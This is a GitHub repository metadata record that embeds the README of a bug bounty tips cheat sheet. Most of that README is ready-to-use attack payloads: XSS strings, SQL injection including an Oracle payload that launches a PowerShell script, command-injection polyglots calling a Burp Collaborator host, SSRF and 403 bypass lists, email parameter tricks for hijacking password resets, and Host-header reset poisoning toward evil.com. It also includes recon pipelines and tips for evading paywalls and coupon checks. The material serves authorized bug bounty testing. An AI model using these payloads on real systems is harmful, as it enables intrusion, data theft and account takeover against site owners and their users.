{"id":13841972,"url":"https://github.com/punishell/bbtips","last_synced_at":"2025-07-11T13:33:28.787Z","repository":{"id":41521352,"uuid":"243748572","full_name":"punishell/bbtips","owner":"punishell","description":"BugBountyTips","archived":false,"fork":false,"pushed_at":"2024-06-05T18:01:02.000Z","size":4313,"stargazers_count":397,"open_issues_count":1,"forks_count":83,"subscribers_count":17,"default_branch":"master","last_synced_at":"2024-08-05T17:30:14.793Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/punishell.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-02-28T11:37:40.000Z","updated_at":"2024-07-24T10:28:16.000Z","dependencies_parsed_at":"2023-01-29T02:15:56.766Z","dependency_job_id":"e12c6c43-713c-4fb6-9b8d-19684e2c4fc0","html_url":"https://github.com/punishell/bbtips","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/punishell%2Fbbtips","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/punishell%2Fbbtips/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/punishell%2Fbbtips/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/punishell%2Fbbtips/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/punishell","download_url":"https://codeload.github.com/punishell/bbtips/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225729793,"owners_count":17515167,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:01:25.125Z","updated_at":"2024-11-21T12:30:43.998Z","avatar_url":"https://github.com/punishell.png","language":"JavaScript","readme":"# BugBounty Tips\t\nCollection of `#bugbountytips` from twitter and my bash-jutsu.\n# Recon\n```\nGoogle the company copyright footer to get more domains.\nUse whoxy.com to perform reverse whois lookups with the email used to register the main domain/\nSearch for slide,docs,demos and video tutorials by your target. Manny innocent examples could leak juicy endpoints.\nUse OpenSSL to get certificates. They can contain valuable info and common names form finding more subdomains.\nTry to recreate data from deleted accounts by siging up with the old email address.\nCheck text version of HTML e-mail for template injections\nWhen testing Rails Application add .json to url endpoints.\ncat file | grep -Eo \"(http|https)://[a-zA-Z0-9./?=_-]*\"*\ncurl http://host.xx/file.js | grep -Eo \"(http|https)://[a-zA-Z0-9./?=_-]*\"* \ngrep -EHirn \"accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into|DB_USER|DB_PASSWORD\" folder/\n```\n\n# Subdomain Enumeration\n```\nsublist3r -d $1 -o $1.txt\nmkdir thirdlevel\necho \"Gathering full third-level domain with sublister\"\nfor domain in $(cat $1.txt); do sublist3r -d $domain -o thirdlevel/$domain.txt; cat thirdlevel/$domain.txt | sort -u \u003e\u003e final.txt; done \necho \"Probing for alive third-levels...\"\ncat final.txt | httprobe \u003e probed.txt\n```\n\n# subdomain level extraction\n|Regex pattern\t|Domain level match|\n| ------ | ------ |\n|grep -P '^(?:[a-z0-9]+\\.){1}[^.]*$'\t|2nd level domains only|\n|grep -P '^(?:[a-z0-9]+\\.){2}[^.]*$'\t|3rd level domains only|\n|grep -P '^(?:[a-z0-9]+\\.){2,}[^.]*$'\t|3rd level domains or higher|\n|grep -P '^(?:[a-z0-9]+\\.){2,3}[^.]*$'\t|3rd to 4th level domains only|\n|grep -P '^(?:[a-z0-9]+\\.){3,}[^.]*$'\t|4th level domains or higher|\n\n# Check live \n```\ncat GREPABLENMAP.gnmap | grep 443/open | cut -d \"(\" -f 1 | cut -d : -f 2| tr -d \" \" | sed -E 's#https?://##I' | sed -E 's#/.*##' | sed -E 's#^\\*\\.?##' | sed -E 's#,#\\n#g' | tr '[:upper:]' '[:lower:]' | uniq | sed -e 's/^/https:\\/\\//' | httpx -silent -timeout 2 -threads 100 -status-code -mc 200,302 |anew \n```\n# Check live webapps from sublis3r\n```\ncat subdomains.txt | sed -E 's#https?://##I' | sed -E 's#/.*##' | sed -E 's#^\\*\\.?##' | sed -E 's#,#\\n#g' | tr '[:upper:]' '[:lower:]' | uniq | sed -e 's/^/https:\\/\\//' | httpx -silent -timeout 2 -threads 100 -status-code -mc 200,302 |anew \n```\n# Filter ffuf output\n```\ncat * | jq | grep \"url\\\"\" | grep -v \"replayproxyurl\" |grep -v \"proxyurl\"  | grep -v \"FUZZ\" | cut -d \\\" -f4\n```\n\n# Extract juicy data from js  \n```\ngo install -v github.com/punishell/gofinder@v0.1.1\necho example.com | assetfinder | httprobe| subjs | gofinder\n\n```\n\n# Tools\n```\nUse exiftool to extract metadata from documents, it might reveal vulnerable htmltopdf generators\nUse cloud_enum to find open google buckets or azure accounts \nUse Grep to extract endpoints with grep: grep -o -E '(https?://)?/?[{}a-z0-9A-Z_\\.-]{2,}/[{}/a-z0-9A-Z_\\.-]+'\nUse WayBackmachine combined with paraminer or parameth\nPassive parameter mining web.archive.org /cdx/search/cdx?url=*.target.com/*\u0026output=text\u0026fl=original\u0026collapse=urlkey\nBurp Collaborator alternative https://app.interactsh.com/#/\n```\n\n# Payloads\n```\nInject payloads in parameter names, ?\u003cscript\u003ealerty\u003c/script\u003e=true\nUse youtube(olx, etc...) videos with xss in names.\nUse round brackets to inject payload into valid e-mail address.\nX-Forwarded-For: ${payload}\nUse longstring parameters for stacktrace.\nWAFBYPASS ?page=\";confirm`1`//   Rightwards -\u003e 302; ?pag%65=\";confirm`1`//   Rightwards -\u003e 200 + XSS!\nRedirect bypass %26next=http://example.com \nWhen testing nodejs site add %ff at the end of url https://target.com/%ff, most of times cause error and return stacktrace with full path\nAdd [] to name of parrameter: pwd= -\u003epwd[]=\nwhen interacting with db try to put % in parameter  ?item=%\n```\n\n# Authentication \u0026 Autorization \n```\nUUID Idor Trick, Register user with the same name, it maybe return uuid.\nTry to bruteforce login endpoint. /login/${oauth_provider}, login/facebook, login/oauth/twitter login/oauth/v2/yahoo\n403 Forbidden bypass, https://host.com/path =403, https://host.com/%2e/path = 200, \nBypass paywalls by using Google Bot user agent.\nUser securitytrails.com to find the originating server IP\nDo match and replace form false to true.\nSet your birthday for today ot tomorrow to get discounts.\nSkip steps: /step/shipping -\u003e  ~~/step/payment~~ -\u003e /step/confirm\nCheck does blackfriday coupon codes expires.\nUse blind xss as password.\nLogin to site using Facebook and try tochange userid during POST requests\n/api/v1/users/profile?id=MYID\u0026id=ANOTHERUSERID -\u003e HTTP 200 \n```\n# Email Restriction bypass\n```\ninti(;inti@inti.io;)@whitelisted.com\n\n→ inti(;\n→ inti@inti.io → my inbox!\n→ ;)@whitelisted.com\n● inti@inti.io(@whitelisted.com)\n● inti+(@whitelisted.com;)@inti.io\n```\n\n# Email Address input fuzz\n```\ntest+(\u003cscript\u003ealert(1)\u003c/script\u003e)@example.com\ntest@example(\u003cscript\u003ealert(1)\u003c/script\u003e).com\n\"\u003cscript\u003ealert(1)\u003c/script\u003e\"@example.com\n\n\"\u003c%=7*7%\u003e\"@example.com\ntest+(${{7*7}})@example.com\n\n\"'OR 1=1--\"@example.com\n\"mail');DROP TABLE users;--\"@example.com\n\ntest@example.burpcollaborator.net\ntest@[127.0.0.1]\n\nvictim\u0026email=attacker@example.com\n\n\"%0d%0aContent-Lenght:%200@0d%0a%0d%0a\"@example.com\"recipient@test.com\u003e\\r\\nRCPT TO:\u003cvictim+\"@test.com\n```\n# Account takeover via Email \n```\nGET /passwordreset\n\nDouble parameter (aka. HPP / HTTP parameter pollution):\nemail=victim@xyz.tld\u0026email=hacker@xyz.tld\nCarbon copy:\nemail=victim@xyz.tld%0a%0dcc:hacker@xyz.tld\nUsing separators:\nemail=victim@xyz.tld,hacker@xyz.tld\nemail=victim@xyz.tld%20hacker@xyz.tld\nemail=victim@xyz.tld|hacker@xyz.tld\nNo domain:\nemail=victim\nNo TLD (Top Level Domain):\nemail=victim@xyz\nJSON table:\n{\"email\":[\"victim@xyz.tld\",\"hacker@xyz.tld\"]}\n```\n# Password Reset:\n```\nreset userpassword: user@email.com.burpcolaborator.com\n```\n# Find GET parameters in example.com\n```\nassetfinder example.com | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo \"var [a-zA-Z0-9]+\" | sed -e 's,'var','\"$url\"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/\u0026=xss/g'); echo -e \"\\e[1;33m$url\\n\\e[1;32m$vars\"; done\n```\n\n# Command injection polyglot\n```\n/*$(ping -c 2 example.com)`ping -c 2 example.com``*/-ping -c 2 example.com-'/*$(ping -c 2 example.com)`ping -c 2 example.com` #*/-ping -c 2 example.com||'\"||ping -c 2 example.com||\"/*`*/\n/*$(echo 1 \u003e/tmp/rce1)`echo 1 \u003e/tmp/rce1``*/-echo 1 \u003e/tmp/rce1-'/*$(echo 1 \u003e/tmp/rce1)`echo 1 \u003e/tmp/rce1` #*/-echo 1 \u003e/tmp/rce1||'\"||echo 1 \u003e/tmp/rce1||\"/*`*/\n|echo lol2137||a #' |echo lol2137||a #|\" |echo lol2137||a #\n||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\\\" |ping -n 21 127.0.0.1\n||`ping -c 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #' |ping -n 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net||`ping -c 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #\\\" |ping -n 21 grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net\n||`dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #' |dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net||`dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net` #\\\" |dig grb0fhwh3gg8b9g0nbeqddobp2vsjh.burpcollaborator.net\n$(sleep 21)\n```\n# SSRF Bypass list for localhost (127.0.0.1):\n```\nhttp://127.1/\nhttp://0000::1:80/\nhttp://[::]:80/\nhttp://2130706433/\nhttp://whitelisted@127.0.0.1\nhttp://0x7f000001/\nhttp://017700000001\nhttp://0177.00.00.01\n```\n\n# Top 25 SSRF parameters\n```\n?dest={target}\n?redirect={target}\n?uri={target}\n?path={target}\n?continue={target}\n?url={target}\n?window={target}\n?next={target}\n?data={target}\n?reference={target}\n?site={target}\n?html={target}\n?val={target}\n?validate={target}\n?domain={target}\n?callback={target}\n?return={target}\n?page={target}\n?feed={target}\n?host={target}\n?port={target}\n?to={target}\n?out={target}\n?view={target}\n?dir={target}\n```\n# Top 25 RCE parameters\n```\n?cmd={payload}\n?exec={payload}\n?command={payload}\n?execute{payload}\n?ping={payload}\n?query={payload}\n?jump={payload}\n?code={payload}\n?reg={payload}\n?do={payload}\n?func={payload}\n?arg={payload}\n?option={payload}\n?load={payload}\n?process={payload}\n?step={payload}\n?read={payload}\n?function={payload}\n?req={payload}\n?feature={payload}\n?exe={payload}\n?module={payload}\n?payload={payload}\n?run={payload}\n?print={payload}\n```\n# Top 25 LFI parameters\n```\n?cat={payload}\n?dir={payload}\n?action={payload}\n?board={payload}\n?date={payload}\n?detail={payload}\n?file={payload}\n?download={payload}\n?path={payload}\n?folder={payload}\n?prefix={payload}\n?include={payload}\n?page={payload}\n?inc={payload}\n?locate={payload}\n?show={payload}\n?doc={payload}\n?site={payload}\n?type={payload}\n?view={payload}\n?content={payload}\n?document={payload}\n?layout={payload}\n?mod={payload}\n?conf={payload}\n```\n\n# HackerOne redirect parameters\n```\n/[redirect]\n?targetOrigin=[redirect]\n?fallback=[redirect]\n?query=[redirect]\n?redirection_url=[redirect]\n?next=[redirect]\n?ref_url=[redirect]\n?state=[redirect]\n?l=[redirect]\n?redirect_uri=[redirect]\n?forum_reg=[redirect]\n?return_to=[redirect]\n?redirect_url=[redirect]\n?return_url=[redirect]\n?host=[redirect]\n?url=[redirect]\n?redirectto=[redirect]\n?return=[redirect]\n?prejoin_data=[redirect]\n?callback_url=[redirect]\n?path=[redirect]\n?authorize_callback=[redirect]\n?email=[redirect]\n?origin=[redirect]\n?continue=[redirect]\n?domain_name=[redirect]\n?redir=[redirect]\n?wp_http_referer=[redirect]\n?endpoint=[redirect]\n?shop=[redirect]\n?qpt_question_url=[redirect]\n?checkout_url=[redirect]\n?ref_url=[redirect]\n?redirect_to=[redirect]\n?succUrl=[redirect]\n?file=[redirect]\n?link=[redirect]\n?referrer=[redirect]\n?recipient=[redirect]\n?redirect=[redirect]\n?u=[redirect]\n?hostname=[redirect]\n?returnTo=[redirect]\n?return_path=[redirect]\n?image=[redirect]\n?requestTokenAndRedirect=[redirect]\n?retURL=[redirect]\n?next_url=[redirect]\n```\n\n# MORE PARAMETERS\nhttps://github.com/1ndianl33t/Gf-Patterns\n\n# Massive XSS\n```\n#!/bin/bash\n# $1 =\u003e example.domain\n\nsubfinder -d $1 -o domains_subfinder_$1\namass enum --passive -d $1 -o domains_$1\n\ncat domains_subfinder_$1 | tee -a domains_$1\ncat domains_$1 | filter-resolved | tee -a domains_$1.txt\n\ncat domains_$1.txt | ~/go/bin/httprobe -p http:81 -p http:8080 -p https:8443 | waybackurls | kxss | tee xss.txt\n```\n# Masive Top Parameters search\n```\nTBA \necho \"http://tesla.com\" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew\n```\n# Juicy GoogleDorks\n```\nsite:example.com inurl:.cgi?\n```\n# File Upload and what to search\n```\nASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE\nSVG: Stored XSS / SSRF / XXE\nGIF: Stored XSS / SSRF\nCSV: CSV injection\nXML: XXE\nAVI: LFI / SSRF\nHTML / JS : HTML injection / XSS / Open redirect\nPNG / JPEG: Pixel flood attack (DoS)\nZIP: RCE via LFI / DoS\nPDF / PPTX: SSRF / BLIND XXE\n```\n# File upload chain\n```\n../../../tmp/lol.png —\u003e for path traversal\nsleep(10)-- -.jpg —\u003e for SQL injection\n\u003csvg onload=alert(document.domain)\u003e.jpg/png —\u003e for XSS\n; sleep 10; —\u003e for command injections\n```\n# Find JavaScript Files in Target.com\n```\necho target.com | gau | grep '\\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'\nor\ncat domains | httpx -silent | subjs | anew\n```\n# Extract endpoints from \\*.js \n```\ncat file.js | grep -aoP \"(?\u003c=(\\\"|\\'|\\`))\\/[a-zA-Z0-9_?\u0026=\\/\\-\\#\\.]*(?=(\\\"|\\'|\\`))\" | sort -u\n```\n\n# 403 bypass\n```\nhttps://target.com/admin/ –\u003e HTTP 302 (redirect to login page)\nhttps://target.com/admin..;/ –\u003e HTTP 200 OK\n\nhttps://target.com/../admin\nhttps://target.com/whatever/..;/admin\n\nsite.com/secret –\u003e HTTP 403 Forbidden\nsite.com/secret/ –\u003e HTTP 200 OK\nsite.com/secret/. –\u003e HTTP 200 OK\nsite.com//secret// –\u003e HTTP 200 OK\nsite.com/./secret/.. –\u003e HTTP 200 OK\n\nX-Original-URL: /admin\nX-Override-URL: /admin\nX-Rewrite-URL: /admin\n\n/accessible/..;/admin\n/.;/admin\n/admin;/\n/admin/~\n/./admin/./\n/admin?param\n/%2e/admin\n/admin#\n\n```\n# Data leakage through .json\n```\nHere’s a tip to achieve sensitive data leak using .json extension.\n\nRequest:\nGET /ResetPassword HTTP/1.1\n{\"email\":\"victim@example.com\"}\n\nResponse:\nHTTP/1.1 200 OK\nNow let’s try this instead:\n\nRequest:\nGET /ResetPassword.json HTTP/1.1\n{\"email\":\"victim@example.com\"}\n\nResponse:\nHTTP/1.1 200 OK\n{\"success\":\"true\",\"token\":\"596a96-cc7bf-9108c-d896f-33c44a-edc8a\"}\n```\n# Generate wordlist for target\n```\necho \"bugcrowd.com\" | subfinder -silent | hakrawler -plain -usewayback -scope yolo | sed $'s/[./?=:\u0026#]/\\\\n/g' | anew\n```\n\n# Check for SQLi\n```\n/?q=1\n/?q=1'\n/?q=1\"\n/?q=[1]\n/?q[]=1\n/?q=1`\n/?q=1\\\n/?q=1/*'*/\n/?q=1/*!1111'*/\n/?q=1'||'asd'||'  \u003c== concat string\n/?q=1' or '1'='1\n/?q=1 or 1=1\n/?q='or''='\n```\n# SQLi in Email parameter\n\n| Payload | Response |Injection Status |\n| ------ | ------ |------ |\n|{“email”:”asd@a.com”}| {“code”:2002,”status”:200,”message”:”Email not found.”}|\tValid|\n|{“email”:”asd a@a.com”}|\t{“code”:2002,”status”:200,”message”:”Bad format”}|\tNot Valid|\t\n|{“email”:”\\”asd a\\”@a.com”}|\t{“code”:2002,”status”:200,”message”:”Bad format”}|\tNot Valid|\t\n|{“email”:”asd(a)@a.com”}|\t{“code”:2002,”status”:200,”message”:”Bad format”}|\tNot Valid|\t\n|{“email”:”\\”asd(a)\\”@a.com”}|\t{“code”:2002,”status”:200,”message”:”Email not found.”}|\tValid|\t\n|{“email”:”asd’a@a.com”}|\t{“code”:0,”status”:500,”message”:”Unspecified error”}|\tNot Valid|\t\n|{“email”:”asd’or’1’=’1@a.com”}|\t{“code”:2002,”status”:200,”message”:”Email not found.”}\tValid|\t\n|{“email”:”a’-IF(LENGTH(database())\u003e9,SLEEP(7),0)or’1’=’1@a.com”}|\t{“code”:2002,”status”:200,”message”:”Bad format”}|\tNot Valid|\n|{“email”:”\\”a’-IF(LENGTH(database())\u003e9,SLEEP(7),0)or’1’=’1\\”@a.com”}|\t{“code”:0,”status”:200,”message”:”Successful”}|\tValid\tDelay: 7,854 milis|\n|{“email”:”\\”a’-IF(LENGTH(database())=10,SLEEP(7),0)or’1’=’1\\”@a.com”}|\t{“code”:0,”status”:200,”message”:”Successful”}|\tValid\tDelay: 8,696 milis|\n|{“email”:”\\”a’-IF(LENGTH(database())=11,SLEEP(7),0)or’1’=’1\\”@a.com”}|\t{“code”:0,”status”:200,”message”:”Successful”}|\tValid\tNo delay|\n\n### Oracle\n```\n1) UNION SELECT CASE WHEN (SELECT ASCII(SUBSTR((SELECT user FROM dual), 1, 1 )) FROM dual) \u003e71 THEN (dbms_pipe.receive_message(('a'),10)) ELSE NULL END FROM dual --\n1' AND 1=2 UNION SELECT SYS.KUPP$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_program(''exec4'',''EXECUTABLE'',''c:\\\\WINDOWS\\\\system32\\\\cmd.exe /c type C:\\\\users\\\\public\\\\shell.ps1 | PowerShell.exe -noprofile - '',0,TRUE);DBMS_SCHEDULER.create_job(job_name=\u003e''myjob11'',program_name=\u003e''exec4'',start_date=\u003eNULL,repeat_interval=\u003eNULL,end_date=\u003eNULL,enabled=\u003eTRUE,auto_drop=\u003eTRUE);dbms_lock.sleep(1);dbms_scheduler.drop_program(program_name=\u003e''exec4'');dbms_scheduler.purge_log;'), null  FROM DUAL --\n1' AND 1=1 UNION SELECT null, user FROM DUAL --\n```\n\n\n### Cool BurpPlugins\n```\nAutorize – To test BACs (Broken Access Control)\nBurp Bounty – Profile-based scanner\nActive Scan++ – Add more power to Burp’s Active Scanner\nAuthMatrix – Authorization/PrivEsc checks\nBroken Link Hijacking – For BLH (Broken Link Hijacking)\nCollaborator Everywhere – Pingback/SSRF (Server-Side Request Forgery)\nCommand Injection Attacker\nContent-Type Converter – Trying to bypass certain restrictions by changing Content-Type\nDecoder Improved – More decoder features\nFreddy – Deserialization\nFlow – Better HTTP history\nHackvertor – Handy type conversion\nHTTP Request Smuggler\nHunt – Potential vuln identifier\nInQL – GraphQL Introspection testing\nJ2EE Scan – Scanning J2EE apps\nJSON/JS Beautifier\nJSON Web Token Attacker\nParamMiner – Mine hidden parameters\nReflected File Download Checker\nReflected Parameter – Potential reflection\nSAML Raider – SAML testing\nUpload Scanner – File upload tester\nWeb Cache Deception Scanner\n```\n# Detect framework via favico\n```\ncat urls.txt | python3 favfreak.py -o output\n```\n\n### Password Poisoning\n```\n(1) Normal request:\n\nRequest:\nPOST /password-reset?user=123 HTTP/1.1\nHost: target.com\nLink received:\nhttps://target.com/reset-link=1g2f3guy23g\n(2) Basic HHI (Host Header Injection):\n\nRequest:\nPOST /password-reset?user=123 HTTP/1.1\nHost: evil.com\nLink received:\nnone\nError 404 - request blocked\n(3) Bypass technique:\n\nRequest:\nPOST https://target.com/password-reset?user=123 HTTP/1.1\nHost: evil.com\nLink received:\nhttps://evil.com/reset-link=1g2f3guy23g\n```\n### Find hostsname form given IP\n\n```\necho 192.168.69.69 | cero\n```\n\n### XSS Post Message POC\n```\nVulnerable PostMessage\n\u003cscript src=\"//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js\"\u003e\u003c/script\u003e\n\u003cscript\u003e\nwindow.addEventListener(\"message\", (event) =\u003e {\nconsole.log(event.data);\n$(event.data)\n}, false);\n\u003c/script\u003e\n\n\nExploit \n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n    \u003chead\u003e\n    \u003c/head\u003e\n\u003cbody\u003e\n\u003cscript\u003e\nvar myWindow = window.open(\"http://example.com/test.html\")\n\u003c/script\u003e\n\u003cscript\u003e\nsetInterval(function(){myWindow.postMessage(\"\u003cimg src=x onerror=alert(123);\u003e\",\"*\");},3000);\nwindow.onmessage = function (e) {\nconsole.log(e);\n};\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n### Deserialization \n```\nhttps://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/\nhttps://github.com/tyranid/ExploitRemotingService\nhttps://github.com/nccgroup/VulnerableDotNetHTTPRemoting\nhttps://github.com/pwntester/ysoserial.net/blob/master/README.md\nhttps://nickbloor.co.uk/2018/02/28/popping-wordpress/\n```\n### From Path Traversal to Source Code in Asp.NET MVC Applications\n```\nhttps://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html\nhttps://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/\nhttp://bit.ly/2NDZc73\n```\n### Hacking IIS\n```\nhttps://www.youtube.com/watch?v=HrJW6Y9kHC4\n```\n\n\n### Geting endpoints from web-archive\n```\ncat hosts.live | gau -b ttf,woff,svg,png,jpg,gif,css,jpeg,pdf,zip,gz | tee -a hosts.gau\n```\n\n### CLI Hacking Cheatsheet\nGetting JS from live hosts\n```\ncat hosts.httprobe | getJS --complete | tee -a hosts.httprobe.js\ncat hosts.httprobe | gau | tee -a hosts.httprobe.gau\ncat hosts.httprobe.gau |grep -iE '\\.js'|grep -ivE '\\.json'|sort -u \u003e\u003e hosts.httprobe.js # cat hosts.httprobe.gau | unfurl format %s://%d%p |grep -iE '\\.js'|grep -ivE '\\.json'|sort -u\ncat hosts.httprobe.js | sort -u \u003e\u003e hosts.httprobe.js.sorted\ncat hosts.httprobe.js.sorted|cut -d \\? -f1 | sort -u | httpx -mc 200 | tee -a hosts.httprobe.js.sorted.200\ncat hosts.httprobe.js.sorted.200 |  httpx -silent -sr -mc 200 \n```\nSearching for RXSS\n```\ncat hosts.httprobe | gau | tee -a hosts.httprobe.gau\ncat hosts.httprobe.gau | unfurl format %s://%d%p | sort -u | tee -a hosts.httprobe.gau.unfurl \ncat hosts.httprobe.gau.unfurl  | httpx -mc 200 | tee -a hosts.httprobe.gau.unfurl.200\ncat hosts.httprobe.gau.unfurl.200 | dalfox pipe -o hosts.httprobe | tee -a hosts.httprobe.gau.unfurl.200.dalfox\n```\nGeting endpoints with potential hackable parameters\n```\ncat hosts.httprobe | cut -d / -f 3 |gau -b css,png,jpeg,jpg,svg,gif,wolf,pdf,txt,ptt,gz,zip,csv | tee -a  hosts.httprobe.gau \ncat hosts.httprobe.gau | grep -E 'asp|aspx|cgi|jsp|php|sql'| unfurl format %s://%d%p | sort -u | tee -a hosts.httprobe.gau.unfurl.ext\nfor i in `cat hosts.httprobe.gau.unfurl.ext`; do  grep $i hosts.httprobe.gau | grep \\? | head -n1  | tee -a hosts.httprobe.gau.unfurl.ext.filtred ; done\ncat hosts.httprobe.gau.unfurl.cgi.filtred | httpx -mc 200 | tee -a hosts.httprobe.gau.unfurl.cgi.filtred.200\n```\nBruteforcing juicy endpoints\n```\nfor i in `cat hosts.httprobe.filtred `; do ffuf -w /payloads/free-kill.txt -u $i/FUZZ -of json -o qh-output/`echo $i | cut -d / -f3` -mc 200 -fl 1 -ac ; done\nfor i in `ls qh-output/`; do cat qh-output/$i | python -m json.tool | grep \"url\\\"\" | grep -v \"replayproxyurl\" |grep -v \"proxyurl\"  | grep -v \"FUZZ\" | cut -d \\\" -f4 \u003e\u003e qh-urls.txt;done \n```\n\n### Random\n```\nhttps://regex-generator.olafneumann.org/\nhttps://regex101.com/\n```\n\n### Reference\nhttps://gowsundar.gitbook.io/book-of-bugbounty-tips/\n\nhttps://soroush.secproject.com/blog/\n","funding_links":[],"categories":["Others (1002)","Others","JavaScript"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpunishell%2Fbbtips","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpunishell%2Fbbtips","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpunishell%2Fbbtips/lists"}